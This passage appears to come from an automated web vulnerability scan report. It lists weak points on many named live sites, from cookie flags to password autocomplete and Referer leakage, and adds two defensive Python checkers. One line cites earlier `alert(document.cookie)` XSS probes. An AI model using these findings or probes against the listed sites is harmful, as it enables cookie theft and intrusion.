15.438. http://www.cisco.com/warp/public/707/newsflash.html

15.439. http://www.codero.com/dedicated-server-hosting/

15.440. http://www.digitalia.be/

15.441. http://www.facebook.com/

15.442. http://www.facebook.com/BlackBerry

15.443. http://www.facebook.com/BlackBerryES

15.444. http://www.facebook.com/BlackBerryFR

15.445. http://www.facebook.com/BlackBerryNL

15.446. http://www.facebook.com/BlackBerryUK

15.447. http://www.facebook.com/BlackBerryZA

15.448. http://www.facebook.com/Craig.Marshall.Deutschland

15.449. http://www.facebook.com/ajouli1

15.450. http://www.facebook.com/americanexpress

15.451. http://www.facebook.com/dcmoncayo

15.452. http://www.facebook.com/fabianomorige

15.453. http://www.facebook.com/laprincesita.inigulable

15.454. http://www.facebook.com/marytere.medina

15.455. http://www.facebook.com/pages/Kledyde/344540630304

15.456. http://www.facebook.com/pages/OrthoSuperSitecom/296664256434

15.457. http://www.facebook.com/pages/Orthopaedic-Trauma-Association/212018968439

15.458. http://www.facebook.com/pages/OwnerIQ/54446991004

15.459. http://www.facebook.com/pages/Tipd/39630264367

15.460. http://www.facebook.com/pointeresortsaz

15.461. http://www.facebook.com/search/

15.462. http://www.facebook.com/uschi.eller

15.463. http://www.facebook.com/vibrantmedia

15.464. http://www.fbi.gov/nipc/welcome.htm

15.465. http://www.forex-direkt.de/

15.466. http://www.forexyard.com/css/quotes-chart.cssbdb85

15.467. http://www.fotoatelier-berlin.de/

15.468. http://www.godaddy.com/default.aspx

15.469. http://www.googleadservices.com/pagead/aclk

15.470. http://www.googleadservices.com/pagead/aclk

15.471. http://www.googleadservices.com/pagead/conversion/1033198129/

15.472. http://www.hyves.nl/

15.473. http://www.itbusinessedge.com/info/gglprojmgmtbeta.aspx/x26display_url=ITBusinessEdge.com/x26google_click_url=http:/googleads.g.doubleclick.net/aclk

15.474. http://www.itbusinessedge.com/info/gglprojmgmtbeta.aspx

15.475. http://www.linuxsecurity.com/

15.476. http://www.live.com/

15.477. http://www.livejournal.com/

15.478. http://www.membershiprewards.com/

15.479. http://www.membershiprewards.com/HomePage.aspx

15.480. http://www.membershiprewards.com/catalog/earn/default.aspx

15.481. http://www.membershiprewards.com/catalog/landing/open/Default.aspx

15.482. http://www.mybloglog.com/links/

15.483. http://www.myfitnesspal.com/nutrition-facts-calories/bjs

15.484. http://www.netvibes.com/

15.485. http://www.newsvine.com/

15.486. http://www.nmworkwear.de/

15.487. http://www.nmworkwear.de/index.php

15.488. http://www.omniture.com/

15.489. http://www.openforum.com/

15.490. https://www.openforum.com/

15.491. http://www.ortho.hyperguides.com/

15.492. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

15.493. http://www.plurk.com/

15.494. http://www.pointehilton.com/toolkit/presentation/shell/hpportal/assets/default.css

15.495. http://www.protopage.com/

15.496. http://www.rackspace.com/apps/email_hosting/exchange_hosting/

15.497. http://www.reddit.com/

15.498. http://www.sitejot.com/

15.499. http://www.splunk.com/download

15.500. http://www.splunk.com/index.php/download_track

15.501. http://www.splunk.com/page/securelink/signup/Splunk_Company_Overview

15.502. http://www.splunk.com/page/securelink/signup/Splunk_Executive_Brief

15.503. http://www.splunk.com/page/securelink/signup/Splunk_Product_Datasheet

15.504. http://www.splunk.com/page/securelink/signup/Splunk_and_MapReduce

15.505. http://www.splunk.com/page/securelink/signup/The_Guide_to_Splunk_and_Operational_Intelligence

15.506. http://www.stumbleupon.com/

15.507. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

15.508. http://www.surveymonkey.com/s/5HNX2M3

15.509. http://www.tel-inform.com/

15.510. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

15.511. http://www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

15.512. http://www.traffictrack.de/tracking/mpr.php

15.513. http://www.tuenti.com/

15.514. http://www.vodafone.de/ptc/setCookie

15.515. http://www.whselfinvest.de/banner/whsbanner.php

15.516. http://www.wtp101.com/pixel

15.517. http://www.youtube.com/americanexpress

15.518. http://www.youtube.com/embed/208T0-OLXA8

15.519. http://www.youtube.com/embed/5aWd_-x1oPE

15.520. http://www.youtube.com/watch

15.521. http://www.zanox-affiliate.de/tpv/

15.522. https://www134.americanexpress.com/consumertravel/travel.do

15.523. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do

15.524. https://www209.americanexpress.com/merchant/mainpagedom/authreg_showMainpage.do

15.525. https://www217.americanexpress.com/cards/home.do

15.526. https://www217.americanexpress.com/cards/shopping/index.jsp

15.527. http://www91.intel.com/b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806

15.528. http://x.ligatus.com/blank.gif

15.529. http://x.ligatus.com/cgi-bin/ivw/CP/9470-215/83-692/83873-62519-_82053-58543-_83885-57091-//

15.530. http://x.ligatus.com/cgi-bin/ivw/CP/9470-215/83-692/84069-53009-_83885-57091-_84615-61457-//

15.531. http://yasnide.ivwbox.de/blank.gif

15.532. http://yasnide.ivwbox.de/cgi-bin/ivw/CP/hp-ano

15.533. http://youmob.com/

15.534. http://ypn-js.overture.com/

15.535. http://zap.mookie1.com/1/vibrantmedia/RadioshackLeadQ1/201101Q1/1/1/1${TIMESTAMP}@x90

15.536. http://zh-hans.splunk.com/

15.537. http://zh-hant.splunk.com/

15.538. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21695681395940

15.539. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21706094634719

15.540. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s29366180438082
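The index above lists cookies set without the HttpOnly attribute; several of the same hosts also appear under the XSS entries earlier in this report with `alert(document.cookie)` payloads (for example 15.24 and 15.25), which is exactly the script read that HttpOnly denies. The checker below is an added example, not code from the CloudScan report or from any of the listed sites: it parses raw `Set-Cookie` header values and reports each cookie missing HttpOnly, and goes one step beyond the report by also flagging a missing Secure attribute when the response came over HTTPS. The header values in `SAMPLE_HEADERS` are constructed for illustration and were not captured from any of the hosts above.

```python
"""Flag Set-Cookie headers that lack the HttpOnly (and Secure) attributes.

Added example for this index; not code from the CloudScan report or from
any scanned site.  SAMPLE_HEADERS below is constructed, not captured.
"""
from dataclasses import dataclass, field


@dataclass
class CookieFinding:
    name: str                                  # cookie name from name=value
    missing: list = field(default_factory=list)  # attribute names that are absent
    raw: str = ""                              # the original Set-Cookie value


def parse_set_cookie(header_value: str):
    """Split one Set-Cookie value into (name, value, attributes).

    RFC 6265 attribute names are case-insensitive, so keys are lower-cased.
    Flag attributes such as HttpOnly and Secure carry no value and map to True;
    valued attributes (Path, Domain, Expires, Max-Age) keep their string value.
    Only the first '=' in a segment splits name from value, so cookie values
    containing '=' (base64, for instance) are preserved.
    """
    segments = [s.strip() for s in header_value.split(";")]
    name, _, value = segments[0].partition("=")
    attrs = {}
    for seg in segments[1:]:
        if not seg:
            continue
        key, sep, val = seg.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return name.strip(), value, attrs


def audit_set_cookie(headers, scheme="https"):
    """Return a CookieFinding for every header missing HttpOnly, and also
    for every header missing Secure when the response scheme is https."""
    findings = []
    for raw in headers:
        name, _value, attrs = parse_set_cookie(raw)
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if scheme == "https" and "secure" not in attrs:
            missing.append("Secure")
        if missing:
            findings.append(CookieFinding(name=name, missing=missing, raw=raw))
    return findings


# Constructed sample response headers (not taken from any listed host).
SAMPLE_HEADERS = [
    "JSESSIONID=0A1B2C3D; Path=/; Secure",                         # no HttpOnly
    "sid=abc123; Path=/; HttpOnly; Secure",                        # clean
    "tracker=xyz; Expires=Wed, 09 Jun 2021 10:18:14 GMT; Path=/",  # neither flag
]

if __name__ == "__main__":
    for f in audit_set_cookie(SAMPLE_HEADERS, scheme="https"):
        print(f"{f.name}: missing {', '.join(f.missing)}  <- {f.raw}")
```

HttpOnly only blocks `document.cookie` reads; an XSS payload on the same origin can still drive authenticated requests with the cookie attached, so the flag narrows the impact of the XSS entries in this report rather than fixing them. Pass `scheme="http"` for plain-HTTP responses so the Secure check is skipped, as it is for the `http://` hosts in the list above.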

16. Password field with autocomplete enabled

16.1. https://axptravel.americanexpress.com/consumertravel/travel.do

16.2. https://axptravel.americanexpress.com/consumertravel/travel.do

16.3. https://axptravel.americanexpress.com/consumertravel/travel.do

16.4. http://channelmarketing.owneriq.com/rmb-account/login-page

16.5. http://dailyme.com/

16.6. http://digg.com/submit

16.7. http://friendfeed.com/

16.8. http://fussballmania.com/

16.9. http://fussballmania.com/

16.10. http://hhonors1.hilton.com/en_US/hh/home_index.do

16.11. http://hhonors1.hilton.com/en_US/hh/home_index.do

16.12. http://malsup.com/jquery/form/

16.13. http://malsup.com/jquery/form/

16.14. http://malsup.com/jquery/form/

16.15. http://malsup.com/jquery/form/

16.16. http://malsup.com/jquery/form/

16.17. http://malsup.com/jquery/form/

16.18. http://multiply.com/

16.19. http://ping.fm/

16.20. http://software.intel.com/en-us/articles/intel-cloud-builders/

16.21. http://software.intel.com/en-us/articles/intel-cloud-builders/

16.22. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

16.23. http://tipd.com/

16.24. http://tipd.com/

16.25. http://tipd.com/register

16.26. http://tipd.com/register

16.27. http://twitter.com/

16.28. http://twitter.com/ORTHOSuperSite

16.29. http://twitter.com/VibrantMedia

16.30. http://twitter.com/owneriq

16.31. http://twitter.com/tipd

16.32. http://unalog.com/

16.33. http://vodpod.com/

16.34. http://wordpress.com/

16.35. https://www.americanexpress.com/gift/giftcardslanding.shtml

16.36. http://www.arto.com/

16.37. http://www.bebo.com/

16.38. http://www.coe.gatech.edu/

16.39. http://www.connotea.org/

16.40. http://www.efort.org/

16.41. http://www.facebook.com/

16.42. http://www.facebook.com/

16.43. http://www.facebook.com/BlackBerry

16.44. http://www.facebook.com/BlackBerryES

16.45. http://www.facebook.com/BlackBerryFR

16.46. http://www.facebook.com/BlackBerryNL

16.47. http://www.facebook.com/BlackBerryUK

16.48. http://www.facebook.com/BlackBerryZA

16.49. http://www.facebook.com/Craig.Marshall.Deutschland

16.50. http://www.facebook.com/ajouli1

16.51. http://www.facebook.com/americanexpress

16.52. http://www.facebook.com/dcmoncayo

16.53. http://www.facebook.com/fabianomorige

16.54. http://www.facebook.com/laprincesita.inigulable

16.55. http://www.facebook.com/marytere.medina

16.56. http://www.facebook.com/pages/Kledyde/344540630304

16.57. http://www.facebook.com/pages/OrthoSuperSitecom/296664256434

16.58. http://www.facebook.com/pages/Orthopaedic-Trauma-Association/212018968439

16.59. http://www.facebook.com/plugins/likebox.php

16.60. http://www.facebook.com/pointeresortsaz

16.61. http://www.facebook.com/uschi.eller

16.62. http://www.facebook.com/vibrantmedia

16.63. http://www.fark.com/

16.64. http://www.godaddy.com/default.aspx

16.65. http://www.hyves.nl/

16.66. http://www.jamespot.com/

16.67. http://www.jazdtech.com/techdirect/

16.68. http://www.jumptags.com/

16.69. http://www.kledy.co.uk/

16.70. http://www.kledy.co.uk/

16.71. http://www.kledy.de/

16.72. http://www.kledy.de/bookmarks.php

16.73. http://www.kledy.de/bookmarks.php

16.74. http://www.kledy.de/bookmarks.php/

16.75. http://www.kledy.de/buttons.php

16.76. http://www.kledy.de/groups.php

16.77. http://www.kledy.de/impressum.php

16.78. http://www.kledy.de/login.php

16.79. http://www.kledy.de/login.php

16.80. http://www.kledy.de/topusers.php

16.81. http://www.kledy.es/

16.82. http://www.kledy.es/

16.83. http://www.kledy.eu/

16.84. http://www.kledy.it/

16.85. http://www.kledy.it/

16.86. http://www.kledy.us/

16.87. http://www.kledy.us/

16.88. http://www.klivio.com/

16.89. http://www.klivio.de/

16.90. http://www.linkagogo.com/

16.91. http://www.linkatopia.com/

16.92. http://www.linkedin.com/

16.93. http://www.linkedin.com/groupInvitation

16.94. http://www.livejournal.com/

16.95. http://www.migrationexpertzone.com/

16.96. http://www.myfitnesspal.com/nutrition-facts-calories/bjs

16.97. http://www.mylinkvault.com/

16.98. http://www.myspace.com/

16.99. http://www.myspace.com/

16.100. http://www.newsvine.com/

16.101. http://www.nmworkwear.de/

16.102. http://www.nmworkwear.de/

16.103. http://www.nmworkwear.de/index.php

16.104. http://www.nowpublic.com/

16.105. http://www.ortho.hyperguides.com/

16.106. http://www.ota.org/members_only/login_menu.cfm

16.107. http://www.pdfforge.org/

16.108. http://www.peppernews.eu/

16.109. http://www.reddit.com/

16.110. http://www.reddit.com/

16.111. http://www.reddit.com/

16.112. http://www.shoppinga.de/

16.113. http://www.sitejot.com/

16.114. http://www.spiele365.com/

16.115. http://www.splunk.com/page/sign_up

16.116. http://www.splunk.com/partners

16.117. http://www.squidoo.com/

16.118. http://www.squidoo.com/

16.119. http://www.stumbleupon.com/

16.120. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

16.121. http://www.technotizie.it/

16.122. http://www.technotizie.it/

16.123. http://www.tumblr.com/

16.124. http://www.tumblr.com/

16.125. https://www.xing.com/

16.126. http://www.yigg.de/

16.127. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

16.128. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

16.129. http://www1.hilton.com/en_US/hi/index.do

16.130. http://www1.hilton.com/en_US/hi/index.do

16.131. http://www1.hilton.com/en_US/hi/index.do
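
The entries under heading 16 are pages where the crawler found an <input type="password"> that neither the field nor its enclosing <form> marks autocomplete="off". The following stand-alone check reproduces that condition offline; it is an added example written for this page, not the crawler's own code and not taken from any of the listed sites, and the HTML it runs on is a constructed sample with hypothetical form ids.

```python
"""Find password fields that allow browser autocompletion.

Added example, not the CloudScan/Burp scanner's code.  It walks HTML with the
standard-library parser and reports every <input type="password"> for which
neither the input nor its enclosing <form> carries autocomplete="off", which is
the condition reported as "Password field with autocomplete enabled".
"""
from html.parser import HTMLParser


class PasswordFieldAuditor(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.form_stack = []   # (form label, form has autocomplete="off") per open <form>
        self.findings = []     # (form label, field name) where autocompletion is allowed

    @staticmethod
    def _attr_map(attrs):
        # html.parser gives [(name, value)] with value None for bare attributes
        return {k.lower(): (v or "") for k, v in attrs}

    def handle_starttag(self, tag, attrs):
        a = self._attr_map(attrs)
        tag = tag.lower()
        if tag == "form":
            label = a.get("id") or a.get("name") or "<anonymous form>"
            self.form_stack.append((label, a.get("autocomplete", "").strip().lower() == "off"))
        elif tag == "input" and a.get("type", "text").strip().lower() == "password":
            field_off = a.get("autocomplete", "").strip().lower() == "off"
            form_label, form_off = self.form_stack[-1] if self.form_stack else ("<no form>", False)
            if not (field_off or form_off):
                self.findings.append((form_label, a.get("name") or a.get("id") or "<unnamed>"))

    # <input .../> is routed to handle_startendtag, which calls both of these
    def handle_endtag(self, tag):
        if tag.lower() == "form" and self.form_stack:
            self.form_stack.pop()


def find_autocomplete_password_fields(html):
    """Return [(form label, field name)] for every password field left autocompletable."""
    p = PasswordFieldAuditor()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample page (hypothetical form ids and actions, not from any listed site).
SAMPLE_HTML = """
<form id="login" action="/login" method="post">
  <input name="user"><input type="password" name="pass">
</form>
<form id="signup" action="/register" method="post" autocomplete="off">
  <input type="PASSWORD" name="new_pass">
</form>
<form id="profile" action="/profile" method="post">
  <input type="password" name="old_pass" autocomplete="off">
  <input type="password" name="confirm_pass"/>
</form>
"""

if __name__ == "__main__":
    for form_label, field in find_autocomplete_password_fields(SAMPLE_HTML):
        print(f"form {form_label!r}: password field {field!r} allows autocomplete")
```

The check is deliberately the same one the scanner applies, so it inherits the scanner's caveat: current browsers ignore autocomplete="off" on login fields and still offer saved credentials, so treat a hit as informational rather than as a defect that setting the attribute would fix.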

17. Source code disclosure

17.1. http://feeds.tipd.com/tipd

17.2. http://www.addthis.com/bookmark.php

17.3. https://www.infosecisland.com/blogview/5213-Splunk-4-Users-Review.html

17.4. http://www.splunk.com/

17.5. http://www.splunk.com/index.php

17.6. http://www.splunk.com/search/docs

17.7. http://www.technotizie.it/

18. Referer-dependent response

18.1. http://www.baselinemag.com/blank.gif

18.2. http://www.baselinemag.com/images/marketplace-hdr-bg.gif

18.3. http://www.baselinemag.com/images/marketplace-hdr.gif

18.4. http://www.baselinemag.com/spacer.gif

18.5. http://www.facebook.com/plugins/like.php

18.6. http://www.facebook.com/plugins/likebox.php

18.7. http://www.kledy.de/modules/buttons/buttons.php

18.8. http://www.peppernews.eu/templates/SquaretleFive/images/about.gif

18.9. http://www.youtube.com/embed/208T0-OLXA8

18.10. http://www.youtube.com/embed/5aWd_-x1oPE

18.11. http://www.youtube.com/v/VUCJyeb_3Mo

18.12. http://www.youtube.com/v/vu-10mHqFko

19. Cross-domain POST

19.1. http://gsgd.co.uk/sandbox/jquery/easing/

19.2. http://info.riministreet.com/50percentsavings.html

19.3. http://personalsavings.americanexpress.com/

19.4. http://personalsavings.americanexpress.com/cd-product.html

19.5. http://personalsavings.americanexpress.com/faq.html

19.6. http://personalsavings.americanexpress.com/open-account.html

19.7. http://personalsavings.americanexpress.com/product-comparison.html

19.8. http://personalsavings.americanexpress.com/savings-product.html

19.9. http://rydex-sgi.com/equalweight/

19.10. http://shop.vodafone.de/scripts/vodafone.global.js

19.11. http://www.bargainforce.com/

19.12. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/

19.13. http://www.baselinemag.com/googlecse.html

19.14. http://www.beckerortho.com/

19.15. https://www.box.net/

19.16. http://www.cssplay.co.uk/menus/final_drop.html

19.17. http://www.eweek.com/c/s/Videos/

19.18. http://www.fbi.gov/about-us/investigate/cyber/cyber

19.19. http://www.fbi.gov/nipc/welcome.htm

19.20. http://www.hyves.nl/

19.21. https://www.infosecisland.com/blogview/5213-Splunk-4-Users-Review.html

19.22. http://www.kledy.de/impressum.php

19.23. http://www.linkfixerplus.com/

19.24. http://www.melsungen-online.de/Shopping/gutschein_gratisartikel.php

19.25. http://www.mittelstandsblog.de/

19.26. http://www.mittelstandsblog.de/

19.27. http://www.mittelstandsblog.de/2011/02/gfk-prognose-deutsche-2011-noch-konsumfreudiger/

19.28. http://www.mittelstandsblog.de/2011/02/gfk-prognose-deutsche-2011-noch-konsumfreudiger/

19.29. http://www.retailmenot.com/

19.30. http://www.stunnel.org/

20. Cross-domain Referer leakage

20.1. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11

20.2. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.3. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.4. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.5. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.6. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.7. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.8. http://ad.doubleclick.net/adj/oiq.man.homeappliance/

20.9. http://answers.splunk.com/questions/ask

20.10. https://axptravel.americanexpress.com/consumertravel/travel.do

20.11. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

20.12. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

20.13. http://cm.g.doubleclick.net/pixel

20.14. http://cm.g.doubleclick.net/pixel

20.15. http://corp.americanexpress.com/gcs/cards/

20.16. http://corp.americanexpress.com/gcs/cards/land/compare.aspx

20.17. http://coverall.splunk.com/themes/splunk_com/scripts/js/global.js

20.18. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js

20.19. http://dslshop.vodafone.de/eshop/pv/97444194

20.20. http://dws1.etoro.com/ApplicationServices/Calendar/

20.21. https://ebus.ota.org/default.aspx

20.22. http://ecal.forexpros.com/e_cal.php

20.23. http://fls.doubleclick.net/activityi

20.24. http://fls.doubleclick.net/activityi

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://googleads.g.doubleclick.net/pagead/ads

20.28. http://googleads.g.doubleclick.net/pagead/ads

20.29. http://googleads.g.doubleclick.net/pagead/ads

20.30. http://googleads.g.doubleclick.net/pagead/ads

20.31. http://googleads.g.doubleclick.net/pagead/ads

20.32. http://googleads.g.doubleclick.net/pagead/ads

20.33. http://googleads.g.doubleclick.net/pagead/ads

20.34. http://googleads.g.doubleclick.net/pagead/ads

20.35. http://googleads.g.doubleclick.net/pagead/ads

20.36. http://googleads.g.doubleclick.net/pagead/ads

20.37. http://googleads.g.doubleclick.net/pagead/ads

20.38. http://googleads.g.doubleclick.net/pagead/ads

20.39. http://googleads.g.doubleclick.net/pagead/ads

20.40. http://googleads.g.doubleclick.net/pagead/ads

20.41. http://googleads.g.doubleclick.net/pagead/ads

20.42. http://googleads.g.doubleclick.net/pagead/ads

20.43. http://googleads.g.doubleclick.net/pagead/ads

20.44. http://googleads.g.doubleclick.net/pagead/ads

20.45. http://googleads.g.doubleclick.net/pagead/ads

20.46. http://googleads.g.doubleclick.net/pagead/ads

20.47. http://googleads.g.doubleclick.net/pagead/ads

20.48. http://googleads.g.doubleclick.net/pagead/ads

20.49. http://googleads.g.doubleclick.net/pagead/ads

20.50. http://googleads.g.doubleclick.net/pagead/ads

20.51. http://googleads.g.doubleclick.net/pagead/ads

20.52. http://googleads.g.doubleclick.net/pagead/ads

20.53. http://googleads.g.doubleclick.net/pagead/ads

20.54. http://googleads.g.doubleclick.net/pagead/ads

20.55. http://googleads.g.doubleclick.net/pagead/ads

20.56. http://googleads.g.doubleclick.net/pagead/ads

20.57. http://googleads.g.doubleclick.net/pagead/ads

20.58. http://googleads.g.doubleclick.net/pagead/ads

20.59. http://googleads.g.doubleclick.net/pagead/ads

20.60. http://googleads.g.doubleclick.net/pagead/ads

20.61. http://googleads.g.doubleclick.net/pagead/ads

20.62. http://googleads.g.doubleclick.net/pagead/ads

20.63. http://googleads.g.doubleclick.net/pagead/ads

20.64. http://googleads.g.doubleclick.net/pagead/ads

20.65. http://googleads.g.doubleclick.net/pagead/ads

20.66. http://googleads.g.doubleclick.net/pagead/ads

20.67. http://googleads.g.doubleclick.net/pagead/ads

20.68. http://googleads.g.doubleclick.net/pagead/ads

20.69. http://googleads.g.doubleclick.net/pagead/ads

20.70. http://googleads.g.doubleclick.net/pagead/ads

20.71. http://googleads.g.doubleclick.net/pagead/ads

20.72. http://googleads.g.doubleclick.net/pagead/ads

20.73. http://googleads.g.doubleclick.net/pagead/ads

20.74. http://googleads.g.doubleclick.net/pagead/ads

20.75. http://googleads.g.doubleclick.net/pagead/ads

20.76. http://googleads.g.doubleclick.net/pagead/ads

20.77. http://googleads.g.doubleclick.net/pagead/ads

20.78. https://home.americanexpress.com/home/corporations.shtml

20.79. http://itunes.apple.com/us/app/orthosupersite/id401876377

20.80. http://jqueryui.com/themeroller/

20.81. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

20.82. http://lovely-faces.com/index.php

20.83. http://lovely-faces.com/index.php

20.84. http://lovely-faces.com/index.php

20.85. http://lovely-faces.com/index.php

20.86. http://lovely-faces.com/index.php

20.87. http://lovely-faces.com/index.php

20.88. http://lovely-faces.com/index.php

20.89. http://lovely-faces.com/index.php

20.90. http://lovely-faces.com/index.php

20.91. http://lovely-faces.com/index.php

20.92. http://lovely-faces.com/index.php

20.93. http://lovely-faces.com/index.php

20.94. http://lovely-faces.com/index.php

20.95. http://lovely-faces.com/index.php

20.96. http://lovely-faces.com/index.php

20.97. http://lovely-faces.com/index.php

20.98. http://lovely-faces.com/index.php

20.99. http://lovely-faces.com/index.php

20.100. http://lovely-faces.com/index.php

20.101. http://lovely-faces.com/index.php

20.102. http://lovely-faces.com/index.php

20.103. http://lovely-faces.com/index.php

20.104. http://lovely-faces.com/index.php

20.105. http://lovely-faces.com/index.php

20.106. http://lovely-faces.com/index.php

20.107. http://lovely-faces.com/index.php

20.108. http://lovely-faces.com/index.php

20.109. http://lovely-faces.com/index.php

20.110. http://lovely-faces.com/index.php

20.111. http://lovely-faces.com/index.php

20.112. http://lovely-faces.com/index.php

20.113. http://lovely-faces.com/index.php

20.114. http://lovely-faces.com/index.php

20.115. http://lovely-faces.com/index.php

20.116. http://lovely-faces.com/index.php

20.117. http://lovely-faces.com/index.php

20.118. http://lovely-faces.com/index.php

20.119. http://lovely-faces.com/index.php

20.120. http://lovely-faces.com/index.php

20.121. http://lovely-faces.com/index.php

20.122. http://lovely-faces.com/index.php

20.123. http://lovely-faces.com/index.php

20.124. http://lovely-faces.com/index.php

20.125. http://lovely-faces.com/index.php

20.126. http://lovely-faces.com/index.php

20.127. http://lovely-faces.com/index.php

20.128. http://lovely-faces.com/index.php

20.129. http://lovely-faces.com/index.php

20.130. http://lovely-faces.com/index.php

20.131. http://lovely-faces.com/index.php

20.132. http://lovely-faces.com/index.php

20.133. http://lovely-faces.com/index.php

20.134. http://lovely-faces.com/index.php

20.135. http://lovely-faces.com/index.php

20.136. http://lovely-faces.com/index.php

20.137. http://lovely-faces.com/index.php

20.138. http://lovely-faces.com/index.php

20.139. http://lovely-faces.com/index.php

20.140. http://lovely-faces.com/index.php

20.141. http://lovely-faces.com/index.php

20.142. http://lovely-faces.com/index.php

20.143. http://lovely-faces.com/index.php

20.144. http://lovely-faces.com/index.php

20.145. http://lovely-faces.com/index.php

20.146. http://lovely-faces.com/index.php

20.147. http://lovely-faces.com/index.php

20.148. http://lovely-faces.com/index.php

20.149. http://lovely-faces.com/index.php

20.150. http://lovely-faces.com/index.php

20.151. http://lovely-faces.com/index.php

20.152. http://lovely-faces.com/index.php

20.153. http://mm.chitika.net/track

20.154. http://personalsavings.americanexpress.com/

20.155. http://personalsavings.americanexpress.com/cd-product.html

20.156. http://personalsavings.americanexpress.com/faq.html

20.157. http://personalsavings.americanexpress.com/open-account.html

20.158. http://personalsavings.americanexpress.com/product-comparison.html

20.159. http://personalsavings.americanexpress.com/savings-product.html

20.160. http://rmncdn.com/widget_cdn.html

20.161. http://searchnet.chitika.net/audience

20.162. http://software.intel.com/en-us/articles/intel-cloud-builders/

20.163. http://software.intel.com/sites/oss/

20.164. http://spongecell.com/api/widgets/clickthrough/263365

20.165. http://statistics.wibiya.com/SetToolbarLoad.php

20.166. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

20.167. http://redacted/MRT/iview/264255445/direct

20.168. http://redacted/MRT/iview/264255445/direct

20.169. http://redacted/MRT/jview/267859374/direct

20.170. http://whitepixel.com/backend/remote/

20.171. https://www.aeprepaid.com/index.cfm

20.172. https://www.americanexpress.com/airlines-credit-card/

20.173. https://www.americanexpress.com/credit-card-rewards/

20.174. https://www.americanexpress.com/gift/giftcardslanding.shtml

20.175. https://www.americanexpress.com/gold-card/

20.176. https://www.americanexpress.com/no-annual-fee-credit-cards/

20.177. http://www.au2m8.com/v/

20.178. http://www.au2m8.com/v/

20.179. http://www.facebook.com/pages/Orthopaedic-Trauma-Association/212018968439

20.180. http://www.facebook.com/plugins/like.php

20.181. http://www.facebook.com/plugins/likebox.php

20.182. http://www.facebook.com/plugins/likebox.php

20.183. http://www.facebook.com/plugins/likebox.php

20.184. http://www.facebook.com/plugins/likebox.php

20.185. http://www.facebook.com/plugins/likebox.php

20.186. http://www.filetransit.com/demo.php

20.187. http://www.filetransit.com/download.php

20.188. http://www.filetransit.com/files.php

20.189. http://www.filetransit.com/freeware.php

20.190. http://www.filetransit.com/screenshot.php

20.191. http://www.filetransit.com/view.php

20.192. http://www.godaddy.com/default.aspx

20.193. http://www.google.com/url

20.194. http://www.google.com/url

20.195. http://www.google.com/url

20.196. http://www.google.com/url

20.197. http://www.google.com/url

20.198. https://www.google.com/adsense/support/bin/request.py

20.199. http://www.kledy.co.uk/

20.200. http://www.kledy.de/bookmarks.php

20.201. http://www.kledy.es/

20.202. http://www.kledy.it/

20.203. http://www.kledy.us/

20.204. http://www.linkedin.com/groupInvitation

20.205. https://www.openforum.com/

20.206. http://www.othawaii.com/default.asp

20.207. http://www.owneriq.com/ownership-targeting

20.208. http://www.retailmenot.com/gui/widget.html

20.209. http://www.splunk.com/

20.210. http://www.splunk.com/download

20.211. http://www.splunk.com/videos

20.212. http://www.splunk.com/view/contact-us/SP-CAAAAH7

20.213. http://www.vibrantmedia.com/whatisIntelliTXT.asp

20.214. http://www.whselfinvest.de/banner/whsbanner.php

20.215. http://www.wyanokeis.com/create.aspx

20.216. http://www201.americanexpress.com/business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789

20.217. http://www201.americanexpress.com/business-credit-cards/business-credit-cards

